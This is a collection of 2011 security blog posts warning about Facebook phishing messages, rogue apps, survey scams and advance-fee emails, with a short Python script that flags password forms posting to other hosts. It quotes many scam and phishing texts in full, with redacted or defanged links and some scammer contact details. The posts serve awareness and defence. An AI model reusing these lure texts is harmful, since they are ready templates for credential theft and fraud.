Silαhkαп mеlαkukαп kопfiгmαsi dαlαm wαkтu 24 Jαm Jikα αпdα mегαsα теlαh тегJαdi kеkеliгuαп.Jikα αпdα тidαk mепgkопfiгmαsi,sisтеm sеcαгα отоmαтis αkαп mепuтup αkuп fαcеbооk αпdα sеcαгα pегmαпеп dепgαп αпggαpαп bαhwα iпdikαsi тегsеbuт bепαг.

тегimα kαsih kαгепα mеmbαптu mепiпgkαтkαп pеlαyαпαп kαmi.

Uптuk Pembαtαlαп, Silαhkαп kопfiгmαsi αkuп fαcеbооk αпdα di bawah ini:

==============================

http://malicious_links/

==============================

Fαcеbооk ™ sеcuгiтy
Fαcеbооk © 2010 Cоpyгighт петwогk Iпc.

your account has been reported by other users for reasons that are not allowed to facebook. facebook does not allow to do actions that are considered annoying or insult other users.
please confirm if you feel there have been mistakes, if you have not been confirmed, the system will automatically close your facebook account permanently.
please confirm your facebook account below :

→ http://malicious_links/

If yоu do пot coпfiгm tһis mistake to us witһiп 24 һοuгs yоuг accоuпt is autоmatically disabled!

Tһапks fог yоuг cоорeгаtiоп.

**Facebook Security Team © 2010**

Facebook requires users to register your account, as proof of the authenticity of your account.
This is because many people who use false identities in their profile that violates our Terms of Use.

Please confirm within 24 hours if you suspect that this is our fault. If you do not confirm our system will automatically close your facebook account permanently with the presumption that such indication is correct.

Please confirm your facebook account on the link below:

——————————

http://malicious_links/

——————————

Thank you for helping improve our service.

Team up ™ security
Up @ 2011 copyright inc.

Facebook Security
To provide you with the information you need to protect your information both on and off Facebook.

You have been reported for inappropriate images or chat user Content…

The Service may invite you to chat or participate in blogs,
message boards, online forums and other functionality and may
provide you with the opportunity to create, submit, post,
display, transmit, perform, publish, distribute or broadcast
content without limitation, text, writings, photographs,
graphics, comments,Any material you transmit to facebook will
be treated as non-confidential and non-proprietary.

You still have your last chance To prevent your account
from being disabled , please login using the address below:
◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊

http://malicious_links/

◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊
Notice : be sure you submitted the correct email,password and
same date of birth u provided in facebook personal information.
Facebook © 2011
█║▌│█│║▌║││█║▌│║▌║

You winner selected α lоtterγ prіze frоm α lоtterγ Zγηgα.
Yоu’ve wоη α $250.000.000 mіllіоη pіeces оf chіps αηd 50 Gоld.
Further іnfоrmαtіоη, clіck оη the URL :

♣♠◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊♣♠

http://malicious_links/

♣♠◊▬▬▬▬▬▬▬▬▬▬▬▬▬▬◊♣♠

Thіs іs α lіst оf ηіηe оther grαηd prіze wіηηers frоm dіffereηt cіtіes:
1. Dαηіel G. frоm Pіcо Rіverα, Lоs Αηgeles
2. Leηіη M. frоm Cuηdіηαmαrcα, Cоlumbіα
3. Mоdestαs P. frоm Pαηevezγs, Lіthuαηіα
4. Mαrk V. frоm Peηηsγlvαηіα, USΑ
5. Αbі R. frоm Αηkαrα, Turkeγ
6. Shαrоη P. frоm Αlbertα, Cαηαdα
7. Αgηαr J. frоm Mαcerαtα, Іtαlγ
8. Bruce M. frоm Eηglαηd, Uηіted Kіηgdоm
9. Mαuі H. frоm Petrіηjα, Crоαtіα

Thαηk γоu tо pαrtіcіpαted, lооk оut fоr the ηext grαηd prіze!
Dоη’t fоrget tо bооkmαrk Zγηgα Pоker,sо γоu cαη eαsіlγ cоme bαck tо the gαme.

Cоpγrіght © 2011 Zγηgα Gαme Ηetwоrk Іηc.. Αll rіghts reserved.

Your account is reported to have violated policies that are considered annoying or insulting Facebook users. Until our security system will deactivate your account within 24 hours if you do not do the reconfirmation.

If you still want to use your account, please confirm your facebook account below:

☞ http://malicious_links/

Facebook Security ™
Copyright Facebook © 2011 Inc
phone:(650.543.4800) fax:(650.543.4801)
▌█ ▐ ║▌█ ▐ ║▌█ ▐ ║▌▌█ ▐ ║▌█ ▐ ║▌█

Facebook security system we have found one indication that you violated the “Terms of Service” (TOS) that contain posts forbidden as follows :

1. Fake profiles.
2. Upload photos or images and videos that contain pornography.
3. Send a message or comment on news that contain insults, hateful, threatening, inciting, or acts of violence to other facebook users.
4. Using facebook account just for the games applications.
5. Perform actions that interfere with and you have been reported by other facebook users.
6. Clicking on a link or links that are wrong and contain the negative content.

Please confirm within 24. when you suspect that you have not been confirmed, the system will automatically close your facebook account permanently with the presumption that such indication is correct.
Please confirm your facebook account by clicking the link below:

http://malicious_links/

Thank you for helping improve our service.

Facebook ™ security
Up @ 2010 copyrights network inc.

The security system we found an indication that you are violating the Terms of Service (TOS) to do a post that contains pornographic, insulting, hateful, threatening, inciting, violence, violations of copyrights or contains nudity.

Please confirm within 24 hours if you feel there has been a mistake.
If you do not confirm, the system will automatically close your facebook account
permanently with the presumption that such indication is correct.

Thank you for helping improve our service.

Security Facеbооk ™
Facеbооk © 2010 Cоpγгіght Nеtwоrk Inc..
█║▌│█│║▌║││█║▌│║█║

Please confirm your facebook account on the following link:
——————–

http://malicious_links/

——————–

Please confirm your Facebook account immediately to avoid permanent closure.
We apologize for the inconvenience.

Our team has seen your facebook activity, and we have seen that you have not done FACEBOOK confirmation. Immediately re-confirm your FACEBOOK before 12 February 2011. If FACEBOOK you in that time have not done your FACEBOOK confirmation then we will be permanently disabling. please note it wisely.

Immediately re-confirm your FACEBOOK at the address below:

===============================

http://malicious_links/

===============================

Thanks,

Mark Zuckerberg

Fαcеbооk ™ sеcuгiтy
Fαcеbооk © 2011 Cоpyгighт петwогk Iпc.
█║▌│█│║▌║││█║▌│║▌║

Your account will be desactivated immediatly. Because someone has reported your actions. Maybe you have written content that is abusive or upload a picture taht can be insulting or harmful to other users. You must confirm your account, to stp the warning desactivated on your account. Please re-confirm your account at:
◄ ▬ V I P® ▬ ► = Hotmail

http://malicious_links/

◄ ▬ V I P® ▬ ► = Yahoo

http://malicious_links/

◄ ▬ V I P® ▬ ► = GmaiL

http://malicious_links/

We provide 24 hours to re-confirm your facebook account. If not, we will desactivate your account for the benefit of other users

Some screenshots of the phishing page:

[Screenshots: phising-page2 through phising-page7]

And here’s the list of known malicious sites (stay away from these sites; some links are still active):


If you get a suspicious message or email, you can forward it to us [malware@computersecurityarticles.info], or you can also submit the malicious file via “Virus Submit”.

And don’t forget to join our Facebook! Stay alert & Stay Safe!

Posted in Facebook, Featured | Comments (3)

So it’s a scam AND phishing attempt

Our previous post about malicious links being spammed out on Facebook said that the links were phishing attempts. Well, turns out it’s also a spyware scam.

So the links we saw being sent around led to a fake Facebook log-in page:

Looks like a plain vanilla phishing attempt so far. However, further testing with a dummy account showed that something a bit more interesting is going on.

If you enter your account details into the supposed log-in page, you’re directed to this enticing notice:

Who doesn’t want a free iPad, right? If you then click on the ‘Claim Now’ buttons for any of the oh-so-lovely prizes, you then get taken to this site:

Still no prizes so far. If you click on the big shiny button on that page, you get this:

And if you do download that, you get a consolation prize of…spyware. And you just paid for it with your account details. Shortly afterwards, Facebook got back to us about some suspicious access activity in our dummy account:

[Screenshot: suspicious-acc]

No, that’s not where we are. Clicking the ‘I don’t recognize’ button led to a new password creation page, which we could use to recover the dummy account.

OK, so this scam is still not terribly new or original. We blogged about a roughly similar scam running around Twitter in August of last year.

Fortunately, the malicious links directing users to these sites are now inactive, and most of the related sites seem to be down. Our product also detects and removes the downloaded spyware.

Still, stay alert and stay safe.

- Post by Shantini

On 22/02/11 At 03:00 AM

Posted in F-Secure, Facebook | Comments (1)

I accepted a fake Facebook friend request, should I be afraid?

Should you be afraid if an imposter duplicates a friend’s Facebook account and connects with you on the social network?

Michael Grayer (@michaelgrayer): “@gcluley A facebook friend had her account duplicated and I accepted the imposter’s friend request (since unfriended). Should I be worried?”

February 20, 2011 10:42 am via web

That’s the question I was asked on Twitter this weekend, and I thought rather than try and squeeze my response to Michael into 140 characters it probably warranted a few more bytes worth of attention.

The short answer as to whether you should be afraid or not, even if you have since unfriended the bogus user, is “possibly”.

First things first, why might someone have created an account in the name of somebody you know and attempted to trick you into accepting them as a friend? Here are some possibilities:

  • Stalker. We don’t know who it is who is trying to enter your circle of friends on Facebook, but it could be someone who wants to track your activity without you knowing. Possibilities include a jealous partner you’ve fallen out with, a rival in love or business, or simply someone who has an unhealthy crush on you. Whatever their motive, someone stalking your online activities and able to read your newsfeed without your permission is creepy. Imagine, for instance, the possibility of coming to harm if you are using a service like Facebook Places which allows other users to determine your physical location.
  • Identity thief. Your bogus Facebook friend may be interested in your profile because of the information you might be sharing up there. In the past we’ve discovered that many users are all too willing to share a dangerous amount of personal information with complete strangers on Facebook – such as their full date of birth, email address, and phone number. This is all information that could be useful to identity thieves.
  • Spammer/Malware author. You’re more likely to open a message from a Facebook “friend” than a complete stranger, because you implicitly trust the person you believe has sent you the message. Therefore, if a bogus Facebook friend sends you a link to a webpage with an alluring enough title, you might well click on it. Don’t be surprised if you’re taken to a webpage containing adverts for improving your sexual performance, or a website carrying a malicious Trojan horse, a rogue Facebook application that tricks you into taking a survey, or even a bogus Facebook login page that attempts to phish your password from you.

So, imposters posing as your friends on Facebook can use the tactic to keep tabs on you, to steal personal information from you, and to try to spread malware and spam.

But more than that, they can use your acceptance of them into your network of friends as a springboard for connecting with others on Facebook too. For instance, imagine Bogus Ben manages to trick you into becoming Facebook friends with him. Bogus Ben can then approach your other friends, and the fact that he is already linked on Facebook to you effectively endorses him to them.

Don’t forget that anyone can create an account on Facebook which uses a bogus name, and scrape together some personal information and a photograph to make it a convincing fake identity to trick you into accepting their friend request. Websites like FriendsReunited and Classmates have made it easy to work out who individuals might have known years before, and give imposters a head start as to who they might want to pose as.

Of course, stalking, spamming, spreading malware and identity theft can all occur on Facebook without creating a bogus account. It’s also important to realise that cybercriminals have often hijacked genuine users’ accounts to spread these sorts of attacks too. So you may already have added a legitimate friend to your network on Facebook, only for their account to later begin to send you, for instance, spam-laden links.

But to go back to the original question – should you be afraid?

Well, that rather depends on what information you share on your Facebook page, or whether you clicked on any links or ran any applications promoted by the imposter.

If you find that you’ve befriended a false Facebook friend, unfriend them immediately and warn your genuine friends about what happened in case they have also added them to their network. You should also check out our tips for better security and privacy on Facebook to make sure that you are following best practices to defend your account.

One thing you definitely need to learn is that it’s sadly just not possible to tell if you should accept someone’s friend request on Facebook just because you recognise their name. Everything on Facebook can be faked, and so the only way you can tell if a friend request was genuine or not is to speak (yes, in real life!) with the person who is trying to add you as a friend.

Otherwise, it might be an imposter, and their motive might vary from mischief to malice.

If you want to learn more about threats on Facebook, join the Sophos Facebook page where more than 60,000 people are benefiting from early warnings about the latest attacks.

Posted in Sophos | Comments Off

Zynga Poker: Facebook Poker Account Confirmation. Beware!

If you receive a message like following:

Hello : [name]

Thanks for playing on Zynga applications.

We have reviewed the suspension on your account. After reviewing your account activity, it was determined that you were in violation of our Terms of Service. We have provided a warning to you via email, but you do not respond to our notification. Therefore, your account is permanently suspended, and will not be reactivated for any reason.

If you think this is a mistake, please verify your account on the link below. This would indicate that your account does not have a violation in playing on our application. We will immediately review your account activity, and we will notify you again via email.

Verify your account immediately at the link below:

hxxp://www.admln-security-games-fcebook.webs.com/

Note : If within 12 hours, you have not verified your account on our link, then you have ignored our notifications. Therefore, your account is permanently suspended, and will not be reactivated for any reason.

Thank you for your attention.

Kind regards,
Zynga Game Network Inc.
Texas HoldEm Poker.
Aттn: Inтellectuαl Properтy Agenт
444 DeHαro St., Suite 132
Sαn Frαncisco, Californiα 94107
Copyright © 2011 Zynga, Inc. All rights reserved.

They say that you are violating their rules. Please beware: this was not actually sent by Zynga. It’s a scam message that tries to steal your password. As long as you do not click the link, your account is still safe, and there’s nothing to worry about.

If you click the link, it will show you this screen:

[Screenshot: mainpage]

With a message to scare users:

Facebook Poker Account Confirmation

Please confirm your facebook poker account as a form of agreement that you promise to not make  a violation a second time.

Email: __________

Password: _____________

By reactivating my account, I agree to follow the Terms of Service going forward and understand that a second offense will result in my account being permanently banned.

The page was actually calling another address:

hxxp://andhy_cuewk.0fees.net/

If you click the “confirm” button, the password will be recorded and you will be redirected to the Zynga forum:

http://forums.zynga.com/forumdisplay.php?f=60#
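The flow described above, a confirmation page on one host that hands the entered credentials to another address, can be checked for statically. The following is an added example, not code from the original post: it flags password forms and frames that point away from the page's own host. The sample HTML, the `.example` host names and all function names are constructed for illustration, and that the original page reached the second address through a form action or a frame is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample, modelled on the flow described in the post: a
# "confirmation" form served from one host that submits to another.
SAMPLE_PAGE_URL = "http://landing.example/"
SAMPLE_HTML = """
<html><body>
<h1>Account Confirmation</h1>
<form method="post" action="http://collector.example/save.php">
  Email: <input type="text" name="email">
  Password: <input type="password" name="pass">
  <input type="submit" value="confirm">
</form>
<form method="get" action="/search"><input type="text" name="q"></form>
<iframe src="http://collector.example/frame.html"></iframe>
</body></html>
"""


class FormAuditor(HTMLParser):
    """Collects each <form> (resolved action, has-password flag) and frame sources."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []     # finished forms
        self.frames = []    # resolved iframe/frame sources
        self._open = None   # form currently being parsed

    def _finish_form(self):
        if self._open is not None:
            self.forms.append(self._open)
            self._open = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._finish_form()  # tolerate a missing </form> before a new form
            # An empty or missing action submits back to the page itself.
            action = urljoin(self.page_url, a.get("action", ""))
            self._open = {"action": action, "password": False}
        elif tag == "input" and self._open is not None:
            if a.get("type", "").lower() == "password":
                self._open["password"] = True
        elif tag in ("iframe", "frame") and a.get("src"):
            self.frames.append(urljoin(self.page_url, a["src"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._finish_form()

    def close(self):
        super().close()
        self._finish_form()  # unclosed <form> at end of sloppy markup


def host(url):
    """Lower-cased host name of a URL, or '' when it has none."""
    return (urlsplit(url).hostname or "").lower()


def audit(page_url, html):
    """Return (finding, host) tuples for credentials or frames leaving the page host.

    Hosts are compared exactly, so a sibling subdomain also counts as
    off-host; relax that only with an explicit allow-list.
    """
    parser = FormAuditor(page_url)
    parser.feed(html)
    parser.close()
    page_host = host(page_url)
    findings = []
    for form in parser.forms:
        if form["password"] and host(form["action"]) != page_host:
            findings.append(("password-form-posts-off-host", host(form["action"])))
    for src in parser.frames:
        if host(src) != page_host:
            findings.append(("off-host-frame", host(src)))
    return findings


if __name__ == "__main__":
    for finding, target in audit(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{finding}: {target}")
```

A finding here is a triage signal, not a verdict: legitimate sites also post logins to a separate authentication host, so the reported host still has to be compared with the brand the page claims to be.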

If you get a suspicious email, you can forward it to us [malware@computersecurityarticles.info], or you can also submit the malicious file via “Virus Submit”.

And don’t forget to join our Facebook! Stay alert & Stay Safe!

Posted in Facebook | Comments Off

Another Facebook phishing scam run

Phishing scams in Facebook. It’s not new and it’s not sophisticated. But they still catch the unwary and they’re still happening now, with only minor tweaks in tactics.

End 2010, we saw a run of phishing scam links being sent around via the chat feature. We’re seeing a new run at the moment. The following links are sent (from hijacked accounts) through chat messages and posts on the Walls of randomly selected friends:

• http://apps.facebook.com/dealscentral[...]/dsuguo[...]/
• http://apps.facebook.com/reallytimeto[...]/
• http://apps.facebook.com/backseatdriver[...]/
• http://apps.facebook.com/fishingfor[...]/

The links look like they would go to an App, but they just take the user to pages that look like the real Facebook log-in page:

[Screenshots: fb_phishing_chat_feb2011, fb_phishing_chat_feb2011_2]

Obviously, those page URLs aren’t legit.

Nothing fancy here, but stay alert and stay safe anyway. This looks to be a small scam run at the moment, would be nice if it died out quick. At time of writing, the first phishing link listed above is no longer active, but the others still work.

You can read more about phishing scams, or report a suspected scam, at the Facebook Phishing Scam Awareness page.

(Shantini, F-Secure)

Posted in Antivirus, F-Secure, Featured | Comments Off

Myleene Klass themed scam mails

The “BBC Lottery” scam mails are in circulation once again, with the following missive appearing in mailboxes:

-----Original Message-----
From: BBC ONE NATIONAL LOTTERY
Sent: Wednesday, February 16, 2011 12:05 PM
Subject: “Final Notification”

Contact (Mrs. Winifred Peterson) with your Payment processing form for
payment of £1,263,584.00 POUNDS which your email won in THE BBC ONE
NATIONAL LOTTERY.
PAYMENT PROCESSING FORM:
(1) FULL NAME:
(2) FULL ADDRESS:
(3) NATIONALITY:
(4) AGE:
(5) OCCUPATION:
(6) TELEPHONE NUMBER:
(7) SEX:
(8) COUNTRY OF RESIDENCE:

Sincerely,
Mrs. Myleene Klass
Lottery Presenter General.
BBC One Lotto.

Apart from the fact that Myleene Klass is NOT going to send you a random email claiming you won lots and lots of money, “Mrs. Winifred Peterson” is a dead giveaway – appearing in many BBC Lottery scams time and time again. Of course, not actually playing the Lottery but winning anyway might also set some alarm bells ringing. Thanks to MrTom for sending this one over.

Christopher Boyd

Posted in GFI Software | Comments Off

Reporter had a stroke on live TV Facebook scam

Serene Branson, a CBS Los Angeles newsreader, became an unwilling YouTube star overnight after speculation spread that she had suffered a stroke while presenting from the Grammy Awards.

The footage of Serene Branson stumbling over her words quickly became viral, as users on Facebook and Twitter passed the link on to each other.

Although reports indicate that Miss Branson was not hospitalised and is “feeling fine”, interest in the video snippet continues to bubble away – and now scammers are exploiting the news story.

If you see a message like the following posted from one of your Facebook friend’s accounts don’t click on the link.

Omg this reporter had a stroke on live tv check it out [LINK]

If you do make the mistake of clicking on the link – perhaps out of morbid curiosity to watch Serene Branson struggling in her piece to camera – you will be presented with a screen like the following claiming that what you are about to do is use a “verified app”.

Of course, the Facebook app is in reality a third-party rogue application, designed to make money for the scammers who instigated the scheme.

The scammers’ plan is to exploit interest in the Serene Branson video, by tricking users into approving an application that will be able to access profiles and post messages onto the walls of Facebook accounts.

Clicking “Approve” is a bad idea, but many people fall for social engineering tricks like this all too easily.

What you probably don’t realise is that behind-the-scenes your own Facebook page has published the link to your online friends and family, encouraging them to also click on the link.

In this way the link spreads virally, increasing the opportunities for the scammers to make money.

And how do they make money? By presenting you with the all-too-familiar survey scam before you can watch the video footage. If you complete the survey, the scammers earn a small amount of commission – and you’ve helped them generate even more by sharing the link virally via your Facebook page.

If you made the mistake of approving the rogue application you should remove it immediately, and remove the offending messages from your Facebook profile before your friends are also roped into the scam.

If you have been hit by scams like this on Facebook, and are struggling to clean-up your profile, here’s a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

Posted in Sophos | Comments Off

Some of the various Valentine's Day-related Facebook apps seeking your approval.

Not-So-Funny Valentine: Facebook Scams Get ‘Romantic’

Valentine’s Day is a favorite holiday of lovers — and hackers.

For years, cybercriminals have used Valentine’s Day as a way to spread spam and viruses using e-cards and offers of bogus gifts.

Today, hackers have another avenue of attack — social media.

That’s why Randy Abrams, director of technical education at Slovakia-based antivirus software company ESET, warns users to keep an eye out for anything that looks out of the ordinary around Valentine’s Day.

“Watch out for messages from friends that are not in their usual style of writing or conversation, especially if they have a link,” Abrams said. “If you get a message from a friend, talk to the friend before you click. That’s how you find out if the friend really meant to send the link.”

Some of the various Valentine's Day-related Facebook apps seeking your approval.

Because we don’t communicate the same way across all social-media platforms, hackers will use different methods to entice potential victims.

For example, Twitter has such a tight limit on message size that shortened URLs, which disguise Web links, are prevalent in all messages, good or bad.

Hackers will often use sensationalism in the message such as, “This is so cute!” or “This is really funny!” to encourage the recipient to click on the shortened URL.

Another approach, Abrams said, is a message received through a hijacked account. The message seems to come from someone you know, so there is an inherent trust in the message.

Abrams pointed out that in April of 2010, a hacker was selling 1.5 million compromised Facebook accounts. The odds are significant that at least one of those accounts belonged to a friend or a friend of a friend of yours — or it might have belonged to you.

And in February of 2011, rogue apps calling themselves “Valentine’s Day” and “Special Valentine” were roaming free on Facebook, duping users into taking money-generating surveys and opening up their friends lists so that the apps could spread further.

So if you think a friend’s account may be compromised, send a private e-mail or pick up the phone to ask if messages he or she sent are legitimate. And always ask friends to return the favor if they see suspicious behavior coming from your account.

Abrams also suggested avoiding the use of third-party vendors to send messages through social media if possible.

“For e-cards, stick with known vendors,” he said. “If you go to a gift shop and look at a greeting card, they have a website and they are in for the long haul. You can trust them.”

The bottom line is that the hackers are out to use you and your information to make money.

“If you click on a link, they might get paid for generating traffic to the website,” Abrams said. “If you fall for a phishing attack and give someone your password because you thought there was a problem with your account, they will steal your account and try to trick your friends into doing things that make them money. If you install an app or other software, they will take control of your computer and rent it out.”

Abrams made a suggestion for this Valentine’s Day. “The Web is a great facilitator, but never replaces a true heart-to-heart. Valentine’s Day is not about trivial clichés, it’s about true sharing. Talk to your friends and loved ones. Not just links, but real conversation.”

 

(© Sue Marquette Poremba, SecurityNewsDaily)

Posted in Facebook | Comments Off

Nigerian scam email claims to be from the FBI

Scam clue #1: FBI personnel can probably write proper English

Alert reader Brian in GFI Business Customer Support forwarded this gem:

From: Sean Dean. [mailto:Sean.Dean@Fbi.gov.us]
Sent: Thursday, February 10, 2011 5:00 AM
To: xxxxxxxx
Subject: Payment Codes: R5109176K

Federal Bureau of Investigation
FBI Seattle Division
1110 Third Avenue
Seattle, Washington 98101-2904

Payment Codes: R5109176K
Reg No: 132731593
Date: February 09, 2011

The Federal Bureau of Investigation (FBI) has discovered through our intelligence Monitoring Network, that you have an on going transaction with a Financial Institution in Nigeria, as the owner of 7.500,000 United State Dollar.

Therefore, the FBI Seattle Division in conjunction with the Economic and Financial Crimes Commission (EFCC), Has screened through our various Monitoring Networks and has been confirmed and notified that the transaction you have with the Financial Institution is Legal and you have the Lawful Right to claim your due fund. We advise you to go ahead with the transaction as we are monitoring all their services and networks. Be advised that any letter or claims notification received from anybody or company should be forwarded to us with immediate effect.

Meanwhile, you are advised to follow the procedure of the Financial Institution. They have their own legal procedure which we have examined and confirmed legal. Follow their instructions while you keep us updated for more details. You are advised to contact the necessary office for more details of transfer as we are monitoring every move now.

Please, be advised and be aware that your funds had been insured and the necessary charges would be taken care of by you, as confirmed by the Monitoring network. For your own good you are advised to confirm any transaction or lottery promo you have either involved yourself with in the past to enable us trace this scammers. Only the Financial Institution has been confirmed Legal any other are still under investigation, and so many others are scam, most especially from Nigeria and Africa.

Please contact the Head of Operations Dr. Tolu Williams, Central Bank of Nigeria.

Dr. Tolu Williams (Head of Operations)
International Remmitance Department
Telephone: +234 808 089 0964
Fax: +234 1 473 5623
Email: central_desks@live.com

Provide him with the information below for verification:

Your name:…………………….
…………………
Residential Address:……………………………
Telephone number:……………………………..

If you need to contact me at any stage please do not hesitate to call (206)350-6981.

Sincerely,

Steven M. Dean (Assistant Special Agent-in-Charge)

One hopes the hilariously bad spelling, punctuation, grammar and capitalization in this thing warn any recipient that it just might not be genuine.

Tom Kelchner

Posted in GFI Software | Comments (1)

Valentine’s Day scam spreads virally on Facebook

With Valentine’s Day approaching on February 14th, scammers on Facebook are ramping up their efforts to take advantage of the traditional day of love to make a quick buck out of unsuspecting users.

Facebook users are being tricked into clicking on messages that they believe their online friends have posted, explaining how to put a heart or love poem on their sweetheart’s wall.

Valentine's Day scam message on Facebook

Is there a girl/boy you really like? why not show him/her via Facebook! give him/her a Love Poem and a Love Heart straight to his/her wall! Get Started Here: [LINK]

Sophos has identified a rogue Facebook application called Valentine’s Day which is responsible for the messages, but it is possible that the scammers could have created others which use similarly love-themed messages.

If you make the mistake of clicking on the link you are taken to a splash screen which displays a teaser, claiming that the application will “generate a random poem and send to one or many friends you select”.

According to the splash screen, the application has 220,673 monthly users – which may make you think that there’s nothing to be suspicious about.

Valentine's Day scam splash screen

However, the third-party Valentine’s Day Facebook application is a rogue app, trying to trick you into agreeing to give it the ability to post status messages to your wall as well as gather information about you including your name, photograph, gender and information about your friends.

Rogue Valentine's Day Facebook app

Clicking on “Allow” is a desperately bad idea, but plenty of Facebook users already have. What they don’t realise is that the application craftily and instantly posts the message advertising the rogue app to your Facebook wall, hoping to draw your online friends into the money-making scheme.

Because the scammers are not really interested in your budding romance. They just want to make money. And they do that by tricking you into taking an online survey disguised as a “Facebook Anti-Spam Verification” dialog box.

Valentine's Day survey scam on Facebook

The scammers, of course, earn commission every time a survey is completed. This is a trick which they are using time and time again on Facebook, earning themselves cash by duping unsuspecting users into taking their surveys. Some surveys even ask you for your mobile phone number, and then sign you up for an expensive premium rate service.

As Valentine’s Day draws closer we can expect to see more and more scammers and cybercriminals attempt to exploit it – and not just on Facebook. In the past, hackers have taken advantage of the international day of love to spread malicious ecards and trick users into running dangerous code on their computers. Make sure you keep your feet on the ground about your computer’s security.

If you have been hit by scams like this on Facebook, and are struggling to clean up your profile, here’s a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

Posted in Sophos | Comments Off

Spam or scam messages. Beware! [02-09-2011]

The following are spam or scam messages that were sent via email or a site/blog comment. If you receive one of these, just ignore it, and please don’t execute the attachment, if any.

1.

Do you need a loan or funding for any reason such as

a) Personal Loan, Business Expansion,
b) Business Start-up, Education,
c) Debt Consolidation
d) Hard Money Loans
loan for any thing ?

We offer loan at low interest rate of 3% and with no credit check, we
offer Personal loans, debt consolidation loans, venture capital, business
loans, education loans, home loans or “loans for any reason!”. However, Our
method, offers you the chance to state the amount of loan needed and also
the duration you can afford. This gives you a real chance to get the funds
you need!

APPLY TODAY ! FILL THE FORM BELOW TO APPLY !

FULL NAMES: _____________________________
SEX:_________________________AGE: _______
OCCUPATION____________________________…
PHONE NUMBER:____________________________
ADDRESS: ________________________________
AMOUNT OF LOAN: _________________________
LOAN DURATION:___________________________

COUNTRY—————————-
————————————–…
To Apply, you can contact us via email out. .with the above information
mohammedhassanloan@gmail.com

2.  “Re: PAYMENT NOTIFICATION!”

WESTERN UNION PAYMENT NOTIFICATION
Attention Beneficiary:
I write to inform you that we have already sent you ($4,500 USD) through Western union as we have been given the mandate to transfer your part compensation payment of ($960,500.00 USD) via western union by the (IMF).Now, I decided to email you the MTCN and sender’s name so that you will be able to pick up this ($4,500 USD) to enable us send another ($4,500 USD) today as you know we will be sending you only ($4,500 USD) per day.
Kindly write down this information and run to western union to pick up the ($4,500 USD) and call me on my direct number so that we can wire the 2nd installment.
My direct phone number is +60103083590 and my direct Email is (wunion.agent4@gmail.com). You can call or email me once you picked up this ($4,500 USD) today.Please note that i am a very busy person and might not be able to pick up your call immediately, so you can send email first.
SENDER`S NAME:Eric Wood
(MTCN): 2138731398
TEXT QUESTION: DOB
ANSWER:1960
AMOUNT: $4,500
I have been delegated to handle the sending of this money due to its magnitude. Respond to me as soon as you get it without hesitation.
Thanks,
Mathew Lang

3.

Hello, Are You Desperately in need of a loan help? Have you be denied of a loan from your bank or any Financial Firm? Do you need financial assistance? Do you need a loan to pay off your bills or buy a home? Do you want to have a Business of your own and you need Financial Loan Help? Contact us today for your Financial Loan Help. We are willing to help you out on either Business or Personal Loans Offer are Available and at affordable interest rate of 3%. Interested Persons should contact us via E-mail:fambarist24@bluesash.net

First Name:_________________________________________

Last Name:__________________________________________

Gender:_______________________ _____________________

Marital status:_____________________________________

Contact Address:____________________________________

City/Zip code:______________________________________

Country:____________________________________________

Date of Birth:______________________________________

Amount Needed as Loan:______________________________

Loan Duration:______________________________________

Monthly Income/Yearly Income:_______________________

Occupation:_________________________________________

Purpose for Loan:___________________________________

House Phone:________________________________________

Cell Phone:______________________ __________________

contact us on our email;fambarist24@bluesash.net
============================
we will be waiting to have the form back from you so that we can start processing.
Regards,Mr Steve Moore

4. “Re:Hello”

I am contacting you base on mutual trust as I do not want problems but just hope you can assist me in actualizing the under mentioned project.I am in control of the sum of four million, eight hundred and fifty thous and US dollars ($4,850,000.00) which was an excess of profit made by our one of our branch Office in the Last quarter Financial Summery of last year 2009, The afore Mentioned amount I have been carefully placed in an Escrow Deposit Account with systematize procedures without declaring it to my executives.Can I really trust you to hold this money for me until I arrive your country and pick it up myself and you deduct 30% of the total money as your commission if you accept my offer you can contact me immediately.

All I need, is you to provide me with a good current bank account where I can move this money through a laid down modalities.I will confidentially, give you all the information concerning the account and the date of deposit so that you can apply to the bank for the release of the money. There is practically no risk involved. It will be a bank-to-bank wire transfer. I hope you understand my situation.

Be rest assured that this transaction is absolutely risk free.I await your urgent response.You can mail me back on this email address: martinlang3@yahoo.com.hk

Thank you and God bless.
Yours truly,
Martin Lang

5.

goodfavourloancompany:
I am answering your dire need of a loan because I am a lender and we
can help you get the loan that you need.galaxy company is
offering loans at a very low interest rate 3% and loan offer ranges
from $5,000 to $800,000.Do you want to boost your business or
financial status.personal ,company,car,mortgage loans all available
for grabs. Contact us for more informations today via
goodfavourloancompany

6.

Do you need a loan of any kind? We give out loans to all parts of the world,
our offer is convenient with affordable repayment scheme. Interest rate is
3% annually with a maximum duration of 50 years. Apply now irrespective of
your credit status. Contact us at
janeberryloancompany@yahoo.com

7. “YOU ARE A LUCKY WINNER “CONGRATULATIONS” OPEN ATTACHMENT”

SHELL PETROLEUM LOTTERY
WINNING NOTIFICATION.
IN COLLARBORATION WITH SHELL PETROLEUM DEVELOPMENT COMPANY
{SPDC} AND BRITISH AMERICAN TOBACCO COMPANY.
Shell UK Limited Shell Centre London SE1 9NA:
REF Nº: EGS/2251256003/02
BATCH Nº: 14/0017/1PD
WINNING Nº: 60/84/27/17/36
OFFICIAL WINNING NOTIFICATION
Dear winner,
Winner in the 2nd category of our Shell Management free Net Lottery Promotional
award draws held on Febuary 1st 2011. I am writing in respect to your lotto
winning prize of US$500,000.00 Dollars (Five hundred thousand Dollars only)
